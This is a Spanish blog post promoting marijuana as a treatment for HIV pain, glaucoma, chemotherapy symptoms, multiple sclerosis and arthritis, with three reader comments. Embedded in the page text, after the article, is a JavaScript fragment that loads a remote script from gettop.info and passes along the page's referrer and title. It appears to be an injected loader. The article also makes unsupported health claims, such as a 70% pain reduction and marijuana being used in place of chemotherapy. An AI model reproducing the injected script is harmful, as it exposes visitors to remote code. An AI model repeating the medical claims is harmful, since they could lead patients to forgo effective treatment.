Salud y belleza » Enfermedades, Medicina, Productos naturales, Salud

Enfermedades que se tratan con marihuana

3 Comentarios

marihuana-medicinalLa legalización o no de la marihuana para consumo recreativo es un tema muy polémico y con mucha discusión en numerosos países. Sin embargo, en casi todos, además de estar considerada una droga también se conocen sus propiedades curativas o paliativas de los síntomas de algunas enfermedades. Para esos fines medicinales si se suele recetar marihuana de forma legal, por lo que te vamos a explicar cuáles son las enfermedades para las que esta hierba sirve como tratamiento.

La marihuana se suele usar como tratamiento en pacientes de VIH SIDA para, sobre todo, tratar el dolor crónico que caracteriza a esta enfermedad que afecta a más de 40 millones de personas en el mundo. Un “porro” de marihuana en estos casos ayudaría a aliviar en un 70% el dolor porque combate la ansiedad, la fatiga y los estados depresivos. A diferencia de otros medicamentos, la marihuana tiene efectos secundarios mucho más leves.

El glaucoma es una enfermedad que produce ceguera inducida por la presión  de los globos oculares. Puede llegar a provocar la pérdida absoluta de la visión. Se dice que fumar marihuana ayuda a aliviar esa presión gracias a su alto contenido de canavinoides. Sin embargo, para que haga efecto es necesario consumir esta hierba en grandes y continuadas dosis, por lo que se está intentando aislar esa sustancia para evitar los efectos negativos.

cancer-quimioEl cáncer es una de las enfermedades más peligrosas y para la que se suele recetar más marihuana, no por la enfermedad, sino por el tratamiento, para paliar los graves síntomas que provoca la quimioterapia. Se ha demostrado que la marihuana ayuda a tratar efectos como los vómitos, las náuseas o la anorexia, por lo que ayudaría a mejorar la calidad de vida del paciente. Pero además, en algunos casos se utiliza esta hierba como sustitutivo del propio tratamiento con quimioterapia.

También se dice que la marihuana ayuda a los pacientes de esclerosis múltiple, una enfermedad que afecta al sistema nervioso y que causa discapacidad. Esta hierba ayudaría gracias a sus propiedades antidepresivas y analgésicas y además ayuda a aliviar el cansancio o la sensación de incontinencia.

marihuana-uso-terapeuticoPor último, la marihuana también constituye un excelente antiinflamatorio y analgésico, por lo que se utiliza también para tratar casos de artritis de cualquier tipo.

Por tanto, la marihuana, además de consumirse como estimulante, constituye un gran tratamiento para muchas enfermedades graves, por lo que no hay que denigrar esta hierba solo por sus efectos secundarios.

¿Qué opinas del uso de la marihuana para fines terapéuticos?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , ,

3 Comments »

  • Fernanda said:

    Mi tío tuvo cáncer y en mi familia no somos muy de marihuana pero lo cierto es que en el último mes de vida era lo único que conseguía hacerle bien, se sentía mucho mejor. Me alegro de que la fumara y de que pudiera ayudarle.

  • Diana said:

    Estoy a favor de la marihuana para pacientes, pero no para uso recreativo, aunque el tabaco en tema salud es más peligroso aunque no de alucinaciones.

  • jaimede la torre said:

    hola yo la utilizo en tintura y microdosis y es muy efectiva y sin ningun efecto secundario se las recomiendo mucho

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.